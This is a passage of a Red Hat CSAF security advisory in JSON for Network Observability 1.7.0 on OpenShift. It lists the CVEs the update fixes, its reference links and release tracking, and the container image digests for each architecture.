"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Network Observability 1.7 for Red Hat OpenShift\n\nRed Hat Product Security has rated this update as having a security impact of\nImportant. A Common Vulnerability Scoring System (CVSS) base score, which gives\na detailed severity rating, is available for each vulnerability from the CVE\nlink(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Network Observability 1.7.0\n\nSecurity Fix(es):\n\n* Network Observability: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n* Network Observability: XSS vulnerability via prototype pollution (CVE-2024-45801)\n* Network Observability: axios: Server-Side Request Forgery (CVE-2024-39338)\n* Network Observability: Denial of Service Vulnerability in body-parser (CVE-2024-45590)\n* Network Observability: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)\n* Network Observability: Backtracking regular expressions cause ReDoS (CVE-2024-45296)\n* Network Observability: Improper Input Handling in Express Redirects (CVE-2024-43796)\n* Network Observability: Improper Sanitization in serve-static (CVE-2024-43800)\n* Network Observability: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)\n* Network Observability: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion (CVE-2024-34155)\n* Network Observability: Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion (CVE-2024-34158)",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:8014",
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "2310527",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310527"
},
{
"category": "external",
"summary": "2310528",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310528"
},
{
"category": "external",
"summary": "2310529",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310529"
},
{
"category": "external",
"summary": "2310908",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310908"
},
{
"category": "external",
"summary": "2311152",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311152"
},
{
"category": "external",
"summary": "2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "2311171",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311171"
},
{
"category": "external",
"summary": "2312631",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2312631"
},
{
"category": "external",
"summary": "NETOBSERV-1377",
"url": "https://issues.redhat.com/browse/NETOBSERV-1377"
},
{
"category": "external",
"summary": "NETOBSERV-1509",
"url": "https://issues.redhat.com/browse/NETOBSERV-1509"
},
{
"category": "external",
"summary": "NETOBSERV-1538",
"url": "https://issues.redhat.com/browse/NETOBSERV-1538"
},
{
"category": "external",
"summary": "NETOBSERV-1540",
"url": "https://issues.redhat.com/browse/NETOBSERV-1540"
},
{
"category": "external",
"summary": "NETOBSERV-1564",
"url": "https://issues.redhat.com/browse/NETOBSERV-1564"
},
{
"category": "external",
"summary": "NETOBSERV-163",
"url": "https://issues.redhat.com/browse/NETOBSERV-163"
},
{
"category": "external",
"summary": "NETOBSERV-1666",
"url": "https://issues.redhat.com/browse/NETOBSERV-1666"
},
{
"category": "external",
"summary": "NETOBSERV-1667",
"url": "https://issues.redhat.com/browse/NETOBSERV-1667"
},
{
"category": "external",
"summary": "NETOBSERV-1733",
"url": "https://issues.redhat.com/browse/NETOBSERV-1733"
},
{
"category": "external",
"summary": "NETOBSERV-1746",
"url": "https://issues.redhat.com/browse/NETOBSERV-1746"
},
{
"category": "external",
"summary": "NETOBSERV-1748",
"url": "https://issues.redhat.com/browse/NETOBSERV-1748"
},
{
"category": "external",
"summary": "NETOBSERV-1753",
"url": "https://issues.redhat.com/browse/NETOBSERV-1753"
},
{
"category": "external",
"summary": "NETOBSERV-1766",
"url": "https://issues.redhat.com/browse/NETOBSERV-1766"
},
{
"category": "external",
"summary": "NETOBSERV-1779",
"url": "https://issues.redhat.com/browse/NETOBSERV-1779"
},
{
"category": "external",
"summary": "NETOBSERV-1783",
"url": "https://issues.redhat.com/browse/NETOBSERV-1783"
},
{
"category": "external",
"summary": "NETOBSERV-1788",
"url": "https://issues.redhat.com/browse/NETOBSERV-1788"
},
{
"category": "external",
"summary": "NETOBSERV-1798",
"url": "https://issues.redhat.com/browse/NETOBSERV-1798"
},
{
"category": "external",
"summary": "NETOBSERV-1805",
"url": "https://issues.redhat.com/browse/NETOBSERV-1805"
},
{
"category": "external",
"summary": "NETOBSERV-1806",
"url": "https://issues.redhat.com/browse/NETOBSERV-1806"
},
{
"category": "external",
"summary": "NETOBSERV-1808",
"url": "https://issues.redhat.com/browse/NETOBSERV-1808"
},
{
"category": "external",
"summary": "NETOBSERV-1811",
"url": "https://issues.redhat.com/browse/NETOBSERV-1811"
},
{
"category": "external",
"summary": "NETOBSERV-1812",
"url": "https://issues.redhat.com/browse/NETOBSERV-1812"
},
{
"category": "external",
"summary": "NETOBSERV-1813",
"url": "https://issues.redhat.com/browse/NETOBSERV-1813"
},
{
"category": "external",
"summary": "NETOBSERV-1816",
"url": "https://issues.redhat.com/browse/NETOBSERV-1816"
},
{
"category": "external",
"summary": "NETOBSERV-1819",
"url": "https://issues.redhat.com/browse/NETOBSERV-1819"
},
{
"category": "external",
"summary": "NETOBSERV-1848",
"url": "https://issues.redhat.com/browse/NETOBSERV-1848"
},
{
"category": "external",
"summary": "NETOBSERV-1884",
"url": "https://issues.redhat.com/browse/NETOBSERV-1884"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8014.json"
}
],
"title": "Red Hat Security Advisory: Network Observability 1.7.0 for OpenShift",
"tracking": {
"current_release_date": "2024-11-08T07:57:04+00:00",
"generator": {
"date": "2024-11-08T07:57:04+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.1.1"
}
},
"id": "RHSA-2024:8014",
"initial_release_date": "2024-10-22T01:05:39+00:00",
"revision_history": [
{
"date": "2024-10-22T01:05:39+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-10-22T01:05:39+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-11-08T07:57:04+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "NETOBSERV 1.7 for RHEL 9",
"product": {
"name": "NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:network_observ_optr:1.7.0::el9"
}
}
}
],
"category": "product_family",
"name": "Network Observability"
},
{
"branches": [
{
"category": "product_version",
"name": "network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"product": {
"name": "network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"product_id": "network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee?arch=amd64\u0026repository_url=registry.redhat.io/network-observability/network-observability-cli-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"product": {
"name": "network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"product_id": "network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f?arch=amd64\u0026repository_url=registry.redhat.io/network-observability/network-observability-console-plugin-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"product": {
"name": "network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"product_id": "network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056?arch=amd64\u0026repository_url=registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"product": {
"name": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"product_id": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45?arch=amd64\u0026repository_url=registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"product": {
"name": "network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"product_id": "network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1?arch=amd64\u0026repository_url=registry.redhat.io/network-observability/network-observability-operator-bundle\u0026tag=1.7.0-86"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"product": {
"name": "network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"product_id": "network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba?arch=amd64\u0026repository_url=registry.redhat.io/network-observability/network-observability-rhel9-operator\u0026tag=v1.7.0-67"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"product": {
"name": "network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"product_id": "network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d?arch=ppc64le\u0026repository_url=registry.redhat.io/network-observability/network-observability-cli-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"product": {
"name": "network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"product_id": "network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86?arch=ppc64le\u0026repository_url=registry.redhat.io/network-observability/network-observability-console-plugin-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"product": {
"name": "network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"product_id": "network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe?arch=ppc64le\u0026repository_url=registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"product": {
"name": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"product_id": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840?arch=ppc64le\u0026repository_url=registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"product": {
"name": "network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"product_id": "network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b?arch=ppc64le\u0026repository_url=registry.redhat.io/network-observability/network-observability-operator-bundle\u0026tag=1.7.0-86"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le",
"product": {
"name": "network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le",
"product_id": "network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a?arch=ppc64le\u0026repository_url=registry.redhat.io/network-observability/network-observability-rhel9-operator\u0026tag=v1.7.0-67"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"product": {
"name": "network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"product_id": "network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd?arch=arm64\u0026repository_url=registry.redhat.io/network-observability/network-observability-cli-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"product": {
"name": "network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"product_id": "network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9?arch=arm64\u0026repository_url=registry.redhat.io/network-observability/network-observability-console-plugin-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"product": {
"name": "network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"product_id": "network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf?arch=arm64\u0026repository_url=registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"product": {
"name": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"product_id": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844?arch=arm64\u0026repository_url=registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"product": {
"name": "network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"product_id": "network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe?arch=arm64\u0026repository_url=registry.redhat.io/network-observability/network-observability-operator-bundle\u0026tag=1.7.0-86"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"product": {
"name": "network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"product_id": "network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080?arch=arm64\u0026repository_url=registry.redhat.io/network-observability/network-observability-rhel9-operator\u0026tag=v1.7.0-67"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"product": {
"name": "network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"product_id": "network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd?arch=s390x\u0026repository_url=registry.redhat.io/network-observability/network-observability-cli-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"product": {
"name": "network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"product_id": "network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd?arch=s390x\u0026repository_url=registry.redhat.io/network-observability/network-observability-console-plugin-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"product": {
"name": "network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"product_id": "network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b?arch=s390x\u0026repository_url=registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"product": {
"name": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"product_id": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e?arch=s390x\u0026repository_url=registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"product": {
"name": "network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"product_id": "network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02?arch=s390x\u0026repository_url=registry.redhat.io/network-observability/network-observability-operator-bundle\u0026tag=1.7.0-86"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"product": {
"name": "network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"product_id": "network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134?arch=s390x\u0026repository_url=registry.redhat.io/network-observability/network-observability-rhel9-operator\u0026tag=v1.7.0-67"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le"
},
"product_reference": "network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64 as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64"
},
"product_reference": "network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x"
},
"product_reference": "network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64 as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64"
},
"product_reference": "network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
